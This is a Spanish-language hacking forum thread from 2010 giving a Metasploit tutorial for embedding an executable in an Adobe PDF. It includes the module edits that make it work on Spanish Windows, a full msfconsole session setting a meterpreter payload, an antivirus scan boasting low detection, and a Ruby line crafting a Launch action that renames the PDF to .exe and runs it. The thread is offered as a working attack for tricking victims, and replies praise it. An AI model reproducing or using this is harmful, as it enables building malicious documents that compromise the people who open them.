[Metasploit] Incrustar ejecutable dentro de un archivo de Adobe PDF

Iniciado por Shell Root, 8 Abril 2010, 07:18 AM

0 Miembros y 1 Visitante están viendo este tema.

Shell Root

Incrustar ejecutable dentro de un archivo de Adobe PDF

[Metasploit By: Shell Root]

Retomando un poco lo que es la herramienta 'Metasploit', encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.

Descripción del Exploit
Ubicación:/windows/fileformat/adobe_pdf_embedded_exe
Nombre:Adobe PDF Embedded EXE Social Engineering
Versión:0
Plataforma:Windows
Licencia:Metasploit Framework License (BSD)
Rango:Excelente
Proporciando por:Colin Ames <amesc@attackresearch.com>
Objetivos disponibles:Adobe Reader v8.x, v9.x (Windows XP SP3 English)
Descripción:Este módulo del Metasploit incorpora una carga de un archivo PDF existente.

Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles (Windows XP ... English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.

Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea 232 del exploit, donde reemplazamos este código:
Código (ruby) [Seleccionar]
232. dirs = [ "Desktop", "My Documents", "Documents" ]
por este:
Código (ruby) [Seleccionar]
232. dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos"]
Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro PoC!

Abrimos la consola del Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf "infectado".
root@bt:/opt/metasploit3/msf3# msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 540 exploits - 256 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
       =[ svn r9040 updated today (2010.04.07)

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   EXENAME                       no        The Name of payload exe.
   FILENAME    evil.pdf          no        The output filename.
   INFILENAME                    yes       The Input PDF filename.
   OUTPUTPATH  ./data/exploits/  no        The location to output the file.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf
FILENAME => PoC_PDF_EXE.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe
EXENAME => /root/cmd.exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf
INFILENAME => /root/PoC_PDF_EXE_File.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started bind handler

[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing Successful.
[*] Using '/root/cmd.exe' as payload...
[*] Creating 'PoC_PDF_EXE.pdf' file...
[*] Generated output file /root/PoC_PDF_EXE.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) > 


PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.

Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.



Miremos que nos dice el Scanner de NoVirusThanks:
CitarFile Info

Report date: 2010-04-08 07:14:17 (GMT 1)
File name: PoC_PDF_EXE.pdf
File size: 1698671 bytes
MD5 Hash: 23d92e4f9b132150d002d014eb772529
SHA1 Hash: 20f0caceffefa8958ffa7638657393ae2d34e3c1
Detection rate: 2 on 20 (10%)
Status: INFECTED

Detections

a-squared - -
Avast - JS:Pdfka-XN [Expl]
AVG - -
Avira AntiVir - -
BitDefender - Exploit.PDF-Dropper.Gen
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
Zoner - -

Scan report generated by NoVirusThanks.org

Fuente: http://shellrootsecurity.blogspot.com/2010/04/metasploit-incrustar-ejecutable-dentro.html
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

darko666

Buenísima la modificación para que funcione en un spanish!!

Debci


laideker


MasterPM2

disculpen mi ingnorancia, pues comienzo a usarlo...
pero...
como llego a esa linea de xploit?


sl2..

buenisismo el tuto..
ANBU暗部   Ansatsu Senjutsu Tokushu Butai暗殺戦術特殊部隊 Fuerza militar especial táctica de eliminación........MyDarker Sid3

<firma retirada, no la vuelvas a poner o se te sancionara>  <- - Amenazas

Shell Root

Emmm dentro de la carpeta /opt/metasploit3/msf3/modules/exploits/windows/fileformat/, buscas el archivo adobe_pdf_embedded_exe.rb

PD: Identifica la diferencia entre Exploit y Xploit.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.


Shell Root

#7
Ahora dirás que es un Copy/Paste?

Nueva linea a modificar 97
Código (ruby) [Seleccionar]
output << "#{obj_num.to_i + 4} 0 obj\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\windows\\\\system32)/P(/Q /C (if exist \"%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\My Documents\"))&(if exist \"%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (cd \"%HOMEPATH%\\\\Desktop\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\My Documents\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%& cd \"My Documents\"))&(if exist \"%HOMEDRIVE%\\\\%HOMEPATH%\\\\Desktop\\\\#{pdf_name}.pdf\" (%HOMEDRIVE%&cd %HOMEPATH%&cd Desktop))&&(ren #{pdf_name}.pdf #{pdf_name}.exe&start #{pdf_name}.exe))>>>>\rendobj\r"
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

toxeek


Nio digo que sea un Copy and Paste.

Ahora, se mas prudente y no saques mucho pecho despues de lo que hicistes.
Se de sobra que usas fuentes externas para elaborar tus tutoriales; no vendria nada mal si las pusieras.

Saludos.
"La envidia es una declaración de inferioridad"
Napoleón.

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.